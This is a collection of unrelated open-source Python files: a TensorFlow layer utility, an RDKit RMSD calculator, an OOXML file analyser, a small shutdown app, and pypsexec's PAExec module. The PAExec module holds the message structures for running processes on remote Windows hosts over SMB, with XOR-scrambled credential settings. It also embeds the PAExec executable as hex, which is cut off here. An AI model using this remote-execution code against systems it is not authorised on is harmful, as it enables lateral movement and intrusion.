#### File: t2tlight/utils/layer.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import math import tensorflow as tf from utils.common import infer_shape def linear(input_data, output_size, bias=True, dtype=None, scope=None): """ output = input_data * W + b """ with tf.variable_scope(scope, default_name="linear"): input_shape = infer_shape(input_data) input_size = input_shape[-1] output_shape = tf.concat([input_shape[:-1], [output_size]], axis=0) W = tf.get_variable("W", shape=[input_size, output_size], dtype=dtype) output = tf.matmul(tf.reshape(input_data, [-1, input_size]), W) if bias: bias = tf.get_variable("b", shape=[output_size], dtype=dtype) output = output + bias return tf.reshape(output, output_shape) def layer_norm(input_data, epsilon=1e-6, dtype=None, scope=None): with tf.variable_scope(scope, default_name="layer_norm"): input_size = infer_shape(input_data)[-1] scale = tf.get_variable("scale", shape=[input_size], initializer=tf.ones_initializer()) bias = tf.get_variable("bias", shape=[input_size], initializer=tf.zeros_initializer) mean = tf.reduce_mean(input_data, -1, True) variance = tf.reduce_mean(tf.square(input_data - mean), -1, True) input_norm = (input_data - mean) * tf.rsqrt(variance + epsilon) output = input_norm * scale + bias return output def smoothed_softmax_cross_entropy(logits, labels, smoothing, normalize): if logits is None or labels is None: raise ValueError("Both logits and labels must be provided") with tf.name_scope("smoothed_softmax_cross_entropy", values=[logits, labels]): labels = tf.reshape(labels, [-1]) if smoothing is None or smoothing == 0.0: ce = tf.nn.sparse_softmax_cross_entropy_with_logits( logits=logits, labels=labels ) return ce # label smoothing vocab_size = tf.shape(logits)[1] n = tf.to_float(vocab_size - 1) p = 1.0 - smoothing q = smoothing / n soft_targets = tf.one_hot(tf.cast(labels, tf.int32), depth=vocab_size, on_value=p, off_value=q) xentropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=soft_targets) if normalize is False: return xentropy # Normalizing constant is the best cross-entropy value with soft targets. # We subtract it just for readability, makes no difference on learning normalizing = -(p * tf.log(p) + n * q * tf.log(q + 1e-20)) return xentropy - normalizing def residual_fn(previous_data, input_data, dropout_rate=None): if dropout_rate is not None and dropout_rate > 0.0: input_data = tf.nn.dropout(input_data, 1 - dropout_rate) return previous_data + input_data ```
{ "source": "0ut0fcontrol/isoRMSD", "score": 3 }
#### File: 0ut0fcontrol/isoRMSD/isoRMSD.py ```python import os from os.path import split import sys import math from numpy.lib.shape_base import column_stack # rdkit imports from rdkit import Chem from rdkit.Chem import AllChem from rdkit.Chem.AllChem import AlignMol def GetBestRMSD(probe, ref, refConfId=-1, probeConfId=-1, maps=None, align=True): """Returns the optimal RMS for aligning two molecules, taking symmetry into account. As a side-effect, the probe molecule is left in the aligned state. Arguments: - ref: the reference molecule - probe: the molecule to be aligned to the reference - refConfId: (optional) reference conformation to use - probeConfId: (optional) probe conformation to use - maps: (optional) a list of lists of (probeAtomId,refAtomId) tuples with the atom-atom mappings of the two molecules. If not provided, these will be generated using a substructure search. Note: This function will attempt to align all permutations of matching atom orders in both molecules, for some molecules it will lead to 'combinatorial explosion' especially if hydrogens are present. Use 'rdkit.Chem.AllChem.AlignMol' to align molecules without changing the atom order. """ # When mapping the coordinate of probe will changed!!! ref.pos = orginXYZ(ref) probe.pos = orginXYZ(probe) try: name = probe.GetProp("_Name") except KeyError as e: name = "NaN" if not maps: matches = ref.GetSubstructMatches(probe, uniquify=False) if not matches: raise ValueError( "mol %s does not match mol %s" % (ref.GetProp("_Name"), probe.GetProp("_Name")) ) if len(matches) > 1e6: print( "{} matches detected for molecule {}, this may lead to a performance slowdown.".format( len(matches), name ) ) maps = [list(enumerate(match)) for match in matches] bestRMSD = 10000.0 for amap in maps: if align: rmsd = AlignMol(probe, ref, probeConfId, refConfId, atomMap=amap) else: rmsd = RMSD_NotAlign(probe, ref, amap) bestRMSD = min(bestRMSD, rmsd) return bestRMSD # Map is probe -> ref # [(1:3),(2:5),...,(10,1)] def RMSD_NotAlign(probe, ref, amap): rmsd = 0.0 # print(amap) atomNum = ref.GetNumAtoms() + 0.0 for (pi, ri) in amap: posp = probe.pos[pi] posf = ref.pos[ri] rmsd += dist_2(posp, posf) rmsd = math.sqrt(rmsd / atomNum) return rmsd def dist_2(atoma_xyz, atomb_xyz): dis2 = 0.0 for i, j in zip(atoma_xyz, atomb_xyz): dis2 += (i - j) ** 2 return dis2 def orginXYZ(mol): mol_pos = {} for i in range(0, mol.GetNumAtoms()): pos = mol.GetConformer().GetAtomPosition(i) mol_pos[i] = pos return mol_pos if __name__ == "__main__": import argparse import pandas as pd from oddt.toolkits import rdk as toolkit parser = argparse.ArgumentParser(__doc__) parser.add_argument( "-r", "--reference", required=True, help="reference mol in .pdb, .mol2 or .sdf format", ) parser.add_argument( "-p", "--probe", required=True, help="probe mols in .pdb, .mol2, or .sdf" ) parser.add_argument( "-o", "--output_csv", default="rmsd.csv", help="output rmsd in a csv file, default: rmsd.csv", ) args = parser.parse_args() ref_fmt = args.reference.split(".")[-1] ref_oddt = next(toolkit.readfile(ref_fmt, args.reference)) ref_rdk = Chem.RemoveHs(ref_oddt.Mol) probe_fmt = args.probe.split(".")[-1] probe_oddt_supp = toolkit.readfile(probe_fmt, args.probe) column_names = ["Mol_Name", "RMSD_Align", "RMSD_NotAlign"] print(column_names) data = [] for i, probe_oddt in enumerate(probe_oddt_supp): if probe_oddt is None: name = "NaN" rmsd_notalign = 10000.0 rmsd_align = 10000.0 else: probe_rdk = Chem.RemoveHs(probe_oddt.Mol) try: name = probe_rdk.GetProp("_Name") name = "_".join(name.split()) except KeyError as e: name = "NaN" print("\nAssign bond orders from probe to reference.") # will raise warning("More than one matching pattern found - picking one") ref = AllChem.AssignBondOrdersFromTemplate(probe_rdk, ref_rdk) # order is matter because GetBestRMSD(align=True) will change probe mol. rmsd_notalign = GetBestRMSD(probe_rdk, ref, align=False) rmsd_align = GetBestRMSD(probe_rdk, ref, align=True) print(f"mol{i:04d} {name} {rmsd_align} {rmsd_notalign}") data.append((name, rmsd_align, rmsd_notalign)) df = pd.DataFrame(data, columns=column_names) df.index.name = "index" df.to_csv(args.output_csv) print(f"\nresult save in {args.output_csv}") ```
{ "source": "0utDoorFr0g/OOXML_auto_analysis", "score": 3 }
#### File: 0utDoorFr0g/OOXML_auto_analysis/OOXML_auto_analysis.py ```python import zipfile import os import shutil class FileInfo: def __init__(self, path): self.target_file_path = path self.unzip_file_path = "" self.ooxml_file_flag = False self.ooxml_file_type = "" # {xl | ppt | word} self.temp_path = "" if FileInfo.check_pk_zip_signature(self.target_file_path) == True: self.temp_path = os.path.dirname(self.target_file_path) + "\\" + "temp" os.makedirs(self.temp_path, exist_ok=True) self.unzip_file_path = self.temp_path + "\\" + "sample" + os.path.basename(self.target_file_path) os.mkdir(self.unzip_file_path) if FileInfo.unzip_file(self.target_file_path, self.unzip_file_path): if FileInfo.check_ooxml_file(self.unzip_file_path): self.ooxml_file_flag = True content_file = open(self.unzip_file_path + "\\" + "[Content_Types].xml","r") content_data = content_file.read() content_file.close() if content_data.find("xl") != -1: self.ooxml_file_type = "xl" elif content_data.find("word") != -1: self.ooxml_file_type = "word" elif content_data.find("ppt") != -1: self.ooxml_file_type = "ppt" else: self.ooxml_file_type = "another" def delete_unzip_file(self): """ delete unziped file package and directory Args: Return: """ shutil.rmtree(self.unzip_file_path) @staticmethod def check_pk_zip_signature(path): """ check the file has PKZIP signature Args: path (string) : file path to check Return: bool : if file has PKZIP signature return True, else return False None : if function raise exception return None """ try: f = open(path,"rb") file_data = f.read(4) f.close() if file_data != b"\x50\x4B\x03\x04": return False else: return True except: return None @staticmethod def unzip_file(target_path, extract_path): """ unzip target file to extract_path Args: target_path (string) : file path to unzip extract_path (string) : unziped result will be placed this path Return: bool : if function succeed return True else return False """ try: target_handle = zipfile.ZipFile(target_path) target_handle.extractall(extract_path) return True except: return False @staticmethod def check_ooxml_file(path): """ check the file is OOXML file Args: path (string) : path to unziped file to check Return: bool : if file is OOXML file return True, else return False """ return os.path.isfile(path + "\\" + "[Content_Types].xml") sample = [FileInfo("C:\\Users\\forgo\\Desktop\\testtt\\abcd" + str(i) + ".zip") for i in range(1,4)] for i in sample: print(i.ooxml_file_type) i.delete_unzip_file() shutil.rmtree(sample[0].temp_path) ```
{ "source": "0v3rl0w/didactic-rotary-phone", "score": 3 }
#### File: apps/shutdown/main.py ```python import os import pygame from typing import Tuple class Shutdown: def __init__(self, size: Tuple[int, int]): self.screen_res = size def mainloop(self, event): if os.environ["dev"] == "dev": exit() else: os.system("poweroff") def get_surface(self) -> pygame.Surface: return pygame.Surface(self.screen_res) def callObject(size: Tuple[int, int]) -> object: return Shutdown(size) ```
{ "source": "0v3rride/pypsexec_mod", "score": 2 }
#### File: pypsexec_mod/pypsexec/paexec.py ```python import binascii import os import struct from smbprotocol.structure import BoolField, BytesField, EnumField, \ IntField, ListField, Structure, StructureField, DateTimeField from pypsexec.exceptions import PAExecException try: from collections import OrderedDict except ImportError: # pragma: no cover from ordereddict import OrderedDict def paexec_out_stream(buffer_size=4096): """ Creates a generator to read the PAExec executable data as a bytes stream. :param buffer_size: The size of the buffer yielded :return: (bytes, offset) = the butes and the offset of the bytes string """ payload_bytes = binascii.unhexlify(PAEXEC_DATA) byte_count = len(payload_bytes) for i in range(0, byte_count, buffer_size): yield payload_bytes[i:i + buffer_size], i def get_unique_id(pid, computer_name): """ https://github.com/poweradminllc/PAExec/blob/master/Remote.cpp#L1045-L1065 DWORD RemMsg::GetUniqueID() Creates a unique ID based on the PID of the local host and the name of the local host. It is derived from the first 4 bytes of a UTF-16 Little Endian encoded computer name and the local PID xor'd together. This value is sent in the PAExecSettingsMsg to define the process details and also the PAExecResponseMsg to control the execution and results of the processed based on the settings. :param pid: (int) the process id of the current host :param computer_name: (str/unicode) of the current hostname :return: int of the unique ID derived from the PID and Computer Name """ bcomp_name = computer_name.encode('utf-16-le')[:4] bcomp_name = bcomp_name + (b"\x00" * (4 - len(bcomp_name))) return pid ^ struct.unpack("<L", bcomp_name)[0] class PAExecMsgId(object): """ https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L52-L57 The various ID's used by PAExec when sending messages to and from the remote service. """ MSGID_SETTINGS = 1 MSGID_RESP_SEND_FILES = 2 MSGID_SENT_FILES = 3 MSGID_OK = 4 MSGID_START_APP = 5 MSGID_FAILED = 6 class ProcessPriority(object): """ https://msdn.microsoft.com/en-us/library/windows/desktop/ms683211(v=vs.85).aspx Set's the priority of the thread in the current process """ ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000 BELOW_NORMAL_PRIORITY_CLASS = 0x00004000 HIGH_PRIORITY_CLASS = 0x00000080 IDLE_PRIORITY_CLASS = 0x00000040 NORMAL_PRIORITY_CLASS = 0x00000020 REALTIME_PRIORITY_CLASS = 0x00000100 class PAExecMsg(Structure): """ Generic message from PAExec, the first 2 bytes denotes the Msg ID that tells the host the type of message it is and the buffer contents varies based on the type of message that is being sent of received. This is slightly different to the PAExecSettingsMsg as the data in the settings msg is xor'd to slightly obfuscate the data. The current buffer structures that have been defined are PAStartBuffer, PAReturnBuffer """ def __init__(self): self.fields = OrderedDict([ ('msg_id', EnumField( size=2, enum_type=PAExecMsgId )), ('unique_id', IntField(size=4)), ('buffer_length', IntField( size=4, default=lambda s: len(s['buffer']) )), ('buffer', BytesField( size=lambda s: s['buffer_length'].get_value() )) ]) super(PAExecMsg, self).__init__() def check_resp(self): msg_id = self['msg_id'].get_value() if msg_id != PAExecMsgId.MSGID_OK: raise PAExecException(msg_id, self['buffer'].get_value()) class PAExecSettingsMsg(Structure): """ Custom PAExecMsg structure that contains the settings used by PAExec to configure the remote process. The structure is different from the standard PAExecMsg as the values past the msg_id is xor'd and the initial XOR value is generated randomly and stored after the msg_id. This does not encrypt the data but rather scrambles it so that someone snooping on the network traffic isn't easily able to see the settings as it can contain the credentials of a user. SMB encryption should really be used in most cases if it is available as that actually encrypts the data. The buffer value contains the PAExecSettingsBuffer type that contains all the settings used by PAExec. """ def __init__(self): self.fields = OrderedDict([ ('msg_id', EnumField( size=2, default=PAExecMsgId.MSGID_SETTINGS, enum_type=PAExecMsgId )), ('xor_val', IntField( size=4, default=os.urandom(4) )), ('unique_id', IntField(size=4)), ('buffer_len', IntField(size=4)), ('buffer', StructureField( structure_type=PAExecSettingsBuffer )) ]) super(PAExecSettingsMsg, self).__init__() def pack(self): # need to xor the buffer as expected by PAExec xor_value = self['xor_val'].get_value() # the id, length and buffer itself is xor'd input_data = self['unique_id'].pack() + self['buffer_len'].pack() + \ self['buffer'].pack() buffer = self._xor_data(xor_value, input_data) # build the final data structure data = self['msg_id'].pack() data += self['xor_val'].pack() data += buffer return data def unpack(self, data): # need to de-xor the buffer to get human readable values xor_value = struct.unpack("<L", data[2:6])[0] buffer = data[6:] buffer_data = self._xor_data(xor_value, buffer) unique_id = buffer_data[:4] buffer_len = buffer_data[4:8] structure_a = PAExecSettingsBuffer() structure_a.unpack(buffer_data[8:]) self['msg_id'] = data[:2] self['xor_val'] = data[2:6] self['unique_id'] = unique_id self['buffer_len'] = buffer_len self['buffer'] = structure_a return b"" def _xor_data(self, xor_value, data): buffer = b"" next_bytes = data[:4] for i in range(0, len(data) - 4): int_value = struct.unpack("<L", next_bytes)[0] xored_value = int_value ^ xor_value new_bytes = struct.pack("<L", xored_value) buffer += new_bytes[:1] next_bytes = new_bytes[1:] + data[i + 4:i + 5] xor_value += 3 int_value = struct.unpack("<L", next_bytes)[0] xored_value = int_value ^ xor_value new_bytes = struct.pack("<L", xored_value) buffer += new_bytes return buffer class PAExecSettingsBuffer(Structure): """ https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L132-L341 A PAExec buffer that contains the settings used by the remote PAExec service to start a process. It contains a wide range of settings that can be configured such as the remote user as well as the executable and arguments used to start the process. All BytesFields in this structure are utf-16-le encoded strings and should be encoded before setting in the structure. """ def __init__(self): self.fields = OrderedDict([ ('version', IntField( size=4, default=1 )), ('num_processors', IntField( size=4, default=lambda s: len(s['processors'].get_value()) )), ('processors', ListField( size=lambda s: s['num_processors'].get_value() * 4, list_count=lambda s: s['num_processors'].get_value(), list_type=IntField(size=4) )), ('copy_files', BoolField(size=1)), ('force_copy', BoolField(size=1)), ('copy_if_newer_or_higher_ver', BoolField(size=1)), ('asynchronous', BoolField(size=1)), ('dont_load_profile', BoolField(size=1)), ('interactive_session', IntField(size=4)), ('interactive', BoolField(size=1)), ('run_elevated', BoolField(size=1)), ('run_limited', BoolField(size=1)), ('password_len', IntField( size=4, default=lambda s: int(len(s['password']) / 2) )), ('password', BytesField( size=lambda s: s['password_len'].get_value() * 2 )), ('username_len', IntField( size=4, default=lambda s: int(len(s['username']) / 2) )), ('username', BytesField( size=lambda s: s['username_len'].get_value() * 2 )), ('use_system_account', BoolField(size=1)), ('working_dir_len', IntField( size=4, default=lambda s: int(len(s['working_dir']) / 2) )), ('working_dir', BytesField( size=lambda s: s['working_dir_len'].get_value() * 2 )), ('show_ui_on_win_logon', BoolField(size=1)), ('priority', EnumField( size=4, default=ProcessPriority.NORMAL_PRIORITY_CLASS, enum_type=ProcessPriority )), ('executable_len', IntField( size=4, default=lambda s: int(len(s['executable']) / 2) )), ('executable', BytesField( size=lambda s: s['executable_len'].get_value() * 2 )), ('arguments_len', IntField( size=4, default=lambda s: int(len(s['arguments']) / 2) )), ('arguments', BytesField( size=lambda s: s['arguments_len'].get_value() * 2 )), ('disable_file_redirection', BoolField(size=1)), ('enable_debug', BoolField(size=1)), ('remote_log_path_len', IntField( size=4, default=lambda s: int(len(s['remote_log_path']) / 2) )), ('remote_log_path', BytesField( size=lambda s: s['remote_log_path_len'].get_value() * 2 )), ('no_delete', BoolField(size=1)), ('src_dir_len', IntField( size=4, default=lambda s: int(len(s['src_dir']) / 2) )), ('src_dir', BytesField( size=lambda s: s['src_dir_len'].get_value() * 2 )), ('dest_dir_len', IntField( size=4, default=lambda s: int(len(s['dest_dir']) / 2) )), ('dest_dir', BytesField( size=lambda s: s['dest_dir_len'].get_value() * 2 )), ('num_src_files', IntField( size=4, default=lambda s: len(s['src_files'].get_value()) )), ('src_files', ListField( list_count=lambda s: s['num_src_files'].get_value(), list_type=StructureField(structure_type=PAExecFileInfo), unpack_func=lambda s, d: self._unpack_file_list(s, d, 'num_src_files') )), ('num_dest_files', IntField( size=4, default=lambda s: len(s['dest_files'].get_value()) )), ('dest_files', ListField( list_count=lambda s: s['num_dest_files'].get_value(), list_type=StructureField(structure_type=PAExecFileInfo), unpack_func=lambda s, d: self._unpack_file_list(s, d, 'num_dest_files') )), ('timeout_seconds', IntField(size=4)) ]) super(PAExecSettingsBuffer, self).__init__() def _unpack_file_list(self, structure, data, len_field): files = [] remaining_data = data for i in range(0, structure[len_field].get_value()): file_structure, remaining_data = self._get_file(remaining_data) files.append(file_structure) return files def _get_file(self, data): min_size = 21 filename_size = struct.unpack("<L", data[:4])[0] structure_end_offset = min_size + (filename_size * 2) file_structure_data = data[:structure_end_offset] file_structure = PAExecFileInfo() file_structure.unpack(file_structure_data) return file_structure, data[structure_end_offset:] class PAExecFileInfo(Structure): """ https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L59-L82 class FileInfo Structure the contains information about a file to copy or move and is set in PAExecSettingsBuffer. Like other PAExec messages, fields that take in a string take in a utf-16-le encoded string as a bytes structure. """ def __init__(self): self.fields = OrderedDict([ ('filename_len', IntField( size=4, default=lambda s: int(len(s['filename']) / 2) )), ('filename', BytesField( size=lambda s: s['filename_len'].get_value() * 2 )), ('file_last_write', DateTimeField(size=8)), ('file_version_ls', IntField(size=4)), ('file_version_ms', IntField(size=4)), ('copy_file', BoolField(size=1)) ]) super(PAExecFileInfo, self).__init__() class PAExecStartBuffer(Structure): """ Can't find where this is explicitly defined but this is the buffer used in the PAExecMsg to start a remote process. On receipt of this message, the remote process will match the settings based on the unique_id passed in and start the process based on those settings. The comp_name is a utf-16-le encoded string of the local hostname and should match the host used in the service name. """ def __init__(self): self.fields = OrderedDict([ ('process_id', IntField(size=4)), ('comp_name_length', IntField( size=4, default=lambda s: int(len(s['comp_name']) / 2) )), ('comp_name', BytesField( size=lambda s: s['comp_name_length'].get_value() * 2 )) ]) super(PAExecStartBuffer, self).__init__() class PAExecReturnBuffer(Structure): """ The buffer used in the PAExecMsg that is sent by the remote service on completion of the remote process. It contains a single Int32 value that is the return code of the process. """ def __init__(self): self.fields = OrderedDict([ ('return_code', IntField(size=4)) ]) super(PAExecReturnBuffer, self).__init__() # https://www.poweradmin.com/paexec/paexec.exe # Hex string of the paexec executable as of v1.26, this is used when copying # the executable from the current hos to the Windows host PAEXEC_DATA = '4d5a90000300000004000000ffff0000b8000000000000004000000000000' \ '00000000000000000000000000000000000000000000000000000000000e8' \ '0000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d206' \ '3616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400' \ '000000000000bc6f8748f80ee91bf80ee91bf80ee91b09c8241bf60ee91b0' \ '9c8271b8a0ee91b09c8261bd60ee91bf1767a1beb0ee91bf80ee81b400ee9' \ '1b9ee03a1bf20ee91b9ee0201bf90ee91bf80e7e1bf90ee91b9ee0251bf90' \ 'ee91b52696368f80ee91b0000000000000000504500004c010500a9dded54' \ '0000000000000000e00002010b010b00008c0100005c010000000000bce90' \ '0000010000000a00100000040000010000000020000050001000000000005' \ '00010000000000002003000004000088eb020003004081000010000010000' \ '0000010000010000000000000100000000000000000000000e4410200b400' \ '000000a00200c0240000000000000000000000cc0200b816000000d002007' \ '41d000010a301003800000000000000000000000000000000000000000000' \ '0000000000a825020040000000000000000000000000a00100a0020000000' \ '0000000000000000000000000000000000000000000002e74657874000000' \ '9d8a010000100000008c01000004000000000000000000000000000020000' \ '0602e7264617461000004b2000000a0010000b40000009001000000000000' \ '00000000000000400000402e6461746100000080310000006002000012000' \ '000440200000000000000000000000000400000c02e72737263000000c024' \ '000000a002000026000000560200000000000000000000000000400000402' \ 'e72656c6f630000564f000000d0020000500000007c020000000000000000' \ '0000000000400000420000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '000000000000000000000000000000000006a04b8238b4100e80ae300008b' \ 'f18975f08d4e046800604200c706a8f84100e80d0f000033db895dfc895e0' \ '8895e0ce852080000894608885e108bc6e8b2e20000c20800558bec568bf1' \ 'e826000000f6450801740756e8f9af0000598bc65e5dc20400568bf1e8560' \ '50000ff36e8e2af0000595ec356578bf98d77088bcec707a8f84100e83805' \ '00008bcee831050000ff36e8bdaf0000598b4f045f83e9105ee9b50e00006' \ '<KEY>' \ '04e8820400008d46088bc88945ece8ea04000068006042008d4ddce84d0e0' \ '<KEY>' \ '000068b8f8410053e8a5af00008bf0595985f60f840603000083c6028bce3' \ '3db8d5102668b0183c102663bc375f52bcad1f90f84e702000068acf84100' \ '<KEY>' \ '0000050895d08e870b000005985c074198bfb83c7020fb70750e85db00000' \ '<KEY>' \ '<KEY>' \ '8d4de8e822040000c645fc048b75e8837ef400745e8b45e080781000750b8' \ 'd4de8e88e0300008b75e88d4ef0e8780c000083c0108945cc8d4ff0c645fc' \ '05e8660c00008d5810895dd08b4dec8d45cc508d45bc50c645fc06e87f030' \ '0008d4bf0e83d0d00008b4dcc8d49f0e8320d00008b5dd883c302e9df0000' \ '008bc32bc66800604200d1f850568d4de4e89a0300008b45e0c645fc07807' \ '8100075088d4de4e80f030000beb4f8410083c3025653e847ae000059593b' \ 'c3750c83c3025653e837ae0000eb0a6a20585053e861af000059894508598' \ '<KEY>' \ 'e8310300008d4ef0c645fc0be8a40b000083c0108945c4c645fc0c8b45d48' \ '3c0f08bc88945d8e88a0b00008d5810895dc88b4dec8d45c4508d45b450c6' \ '45fc0de8a30200008d4bf0e8610c00008b4dc48d49f0e8560c00008b4dd8e' \ '84e0c00008b45088d580233c08d4ef08845fce83b0c00008bcb33f68d5102' \ '668b0183c102663bc675f52bcad1f90f85c8fdffffe9e0000000538d4d08e' \ '8b7010000c645fc088b75e4837ef400744a8d4ef0e8030b000083c0108945' \ 'c4c645fc098b4d088d49f0e8ee0a00008d5810895dc88b4dec8d45c4508d4' \ '<KEY>' \ '8b45088d48f0e8af0b00008d4ef0eb6b568d4d08e8470100008b45e0c645f' \ 'c018078100075088d4d08e89e0100008b4d088d49f0e8880a00008d581089' \ '<KEY>' \ '0c645fc03e88f0100008d4ef0e84d0b00008d4bf0e8450b00008b45088d48' \ 'f0e83a0b00008d4ff0e8320b000032c0e8c4de0000c20400568bf18b4e048' \ '3e910e81a0b00008b0e83e9105ee90f0b00006a04b8d18b4100e8bfde0000' \ '8bd9ff750c8d4d0ce89c0000008365fc00807b100075088d4d0ce8f600000' \ '<KEY>' \ '8b36807e0d0074e23b7b087414ff77108d4d0ce85202000085c07805897df' \ '<KEY>' \ 'c6e81cde0000c20800558bec56ff75088d4508508bf1e85fffffff8b45083' \ 'b46085e750433c0eb038b40145dc204006a04b8f3924100e80ade00008bf1' \ '8975f06800604200e8160a00008b45088365fc0085c07414a90000ffff750' \ 'd0fb7c0508bcee84b010000eb08508bcee80a0000008bc6e8aadd0000c204' \ '00558bec568bf18b4d08e88602000050ff75088bcee8670800008bc65e5dc' \ '2040056578bf98b078b70f456e8ee0700008d56015250e873af0000595956' \ '<KEY>' \ '<KEY>' \ '06ff7004e8780000008b068940048b0689008b06894008836604005ec3558' \ '<KEY>' \ 'eb378b016a0256ff1085c0743183c010568bcf8907e8850700008d043650f' \ 'f750850ff37e86cac000083c4108bc75f5e5dc20c006805400080e8d90800' \ '<KEY>' \ 'be8e3ffffff8b3f8d4e10e8c5fdffff56e8e1a90000807f0d00598bf774dd' \ '5f5e5b5dc20400558bec51535657894dfc6a00b9cc704200e884a7000033d' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'c8015dc204006805400080e8d6070000cc558bec8b450c53c1e80456400fb' \ '<KEY>' \ '00008bf05985f6745f570fb73e578bcbe8e40500000fb70e83c6028945088' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '0e8b42043b1075048930eb0389700889168972045e5dc20400558bec8b550' \ '8568b328b460889028b460880780d0075038950048b42048946048b013b50' \ '047505897004eb0f8b42043b50087505897008eb0289308956088972045e5' \ 'dc204006a18e85ead00005985c00f84d4a600008d4804890085c974028901' \ '8d480885c97402890166c7400c0101c36a10b8f28a4100e8c2da0000894de' \ '433db895dfc8b39b0018b77048845ec807e0d00753a8bfe84db74148b4510' \ '8d4e10ff30e816feffff85c00f99c0eb10ff76108b4d10e804feffff85c00' \ 'f98c08845ec84c074048b36ebc58b7608ebc08bf78975e884c074398b4de4' \ '8b013b387525ff75148d4510ff7510576a0150e8990000008b088b4508890' \ '8c6400401e8b0d90000c210008d4de8e83a0000008b75e88b45108d4e10ff' \ '30e8a0fdffff85c07912ff75148b4de4ff75108d45e857ff75ecebb98b450' \ '88930885804ebc033db5353e811d90000cc8b11807a0d0074058b4208eb15' \ '<KEY>' \ 'b89118b5204807a0d0074ef8b0180780d00750289118bc1c3558bec535657' \ '<KEY>' \ '08943048b0f3bc1750e8959048b0789188b07895808eb1f807d0c00740c89' \ '188b0f3b0175118919eb0d8958088b0f3b410875038959088b43048bf3e99' \ '30000008b46048b50048b0a3bc175388b4a0880790c0074353b7008750a8b' \ '<KEY>' \ '4ff7004e8cdfdffffeb4c80790c00751ac6400c01c6410c018b46048b4004' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '0f84100e8aea40000cc6a10b8d78a4100e885d80000e8630000008bf833c9' \ '<KEY>' \ 'b0b83e910e83603000083c0108906c645fc028b4b0483e910e82203000083' \ 'c0108946048bc7e8a7d70000c20400ff75ece8fda400005933c95151e837d' \ '70000cc566a188bf1e87faa00008bd05985d2741e8b068d4a04890285c974' \ '048b0689018d4a0885c974048b0689018bc25ec3e8d4a30000ccc3558bec8' \ '<KEY>' \ '000780eb0e680e000780eb075dc36805400080e847030000cc558bec53578' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'd28b06578d48f08b39395104742739510c7d113950f87c208950f48b0633c' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'fc017e0a568bcfe843ffffffeb2d8b49f83bce7d2681f9000000407e0881c' \ '100001000eb098bc1992bc2d1f803c83bce0f4cce518bcfe878ffffff5f5e' \ '<KEY>' \ 'bc87d08528bcee884ffffff8b065e5dc204006857000780e879010000cc55' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '3c4108bcf53e85cffffff5f5bc9c208006857000780e8c4000000cc680e00' \ '0780e8b9000000cc568bf1578b0e8b01ff50108d560c8bc8833a007c0f3b0' \ 'e750b33c08bfe40f00fc102eb318b016a02ff7604ff108bf885ff74278b46' \ '048947048b46048d0c4502000000518d461050518d471050e8e4a3000083c' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '0983e910e941000000558bec8b450889450868603142008d450850e868d30' \ '<KEY>' \ '<KEY>' \ '88b0e568b01ff50045ec36a30b8578c4100e894d300008bfa8bd933c04050' \ '8945ec8d45c450ff1558a041006a006a006a018d45c450ff155ca04100836' \ '5dc008365e0008d45c468006042008d4df0c745d80c0000008945dcc745e0' \ '01000000e861ffffffff75088365fc00578d45e868c4f8410050e8378f000' \ '083c410508d4df0c645fc01e8cbfeffffc645fc008b4de88d49f0e855ffff' \ 'ff8b35bca041008d45d8506aff33c0505068ff000000506a02ff75f0ffd68' \ '98390000000ff15c0a041008b8b900000008945e883f9ff740485c97531ff' \ '75f08d45e468f8f8410050e8cc8e000083c40cc645fc028b55e88b08e88f9' \ '00000c645fc008b4de48d49f0e8e9feffffff75088d45e457683cf9410050' \ 'e89a8e000083c410508d4df0c645fc03e82efeffffc645fc008b4de48d49f' \ '0e8b8feffff8d45d8506aff33c0505068ff000000506a02ff75f0ffd68983' \ '98000000ff15c0a041008b8b980000008bf083f9ff740485c97530ff75f08' \ 'd45e468f8f8410050e8368e000083c40cc645fc048b088bd6e8fa8f0000c6' \ '45fc008b4de48d49f0e854feffffff75088d45e457686cf9410050e8058e0' \ '00083c410508d4df0c645fc05e899fdffffc645fc008b4de48d49f0e823fe' \ 'ffff8b75f08d45d8506aff33c0505068ff000000506a0156ff15bca041008' \ '98394000000ff15c0a041008b8b940000008bf883f9ff740485c9752e568d' \ '45e468f8f8410050e89e8d000083c40cc645fc068b088bd7e8628f0000c64' \ '5fc008b4de48d49f0e8bcfdffff8b839000000083f8ff744f85c0744b8b8b' \ '9800000083f9ff744085c9743c8b8b9400000083f9ff743185c9742d8b3dc' \ '8a041006a0050ffd76a00ffb398000000ffd76a00ffb394000000ffd732d2' \ 'b9e0f94100e86e8f0000eb3d8b3dc4a0410050ffd7ffb398000000ffd7ffb' \ '394000000ffd733c0b201b998f94100898390000000898398000000898394' \ '000000e8338f0000c645ec008d4ef0e81dfdffff8a45ece8aed00000c3558' \ 'bec81ec50010000a16063420033c58945fc53568b75086af5ff15cca04100' \ '33db68ff0000008985d0feffff8d85fdfeffff5350889dfcfeffffe87ac70' \ '00083c40c899ddcfeffff53536a0153ff15d0a04100803d32804200008bd8' \ '899dd8feffff0f857f0100005783a5b0feffff0033c08dbdb4feffffababa' \ 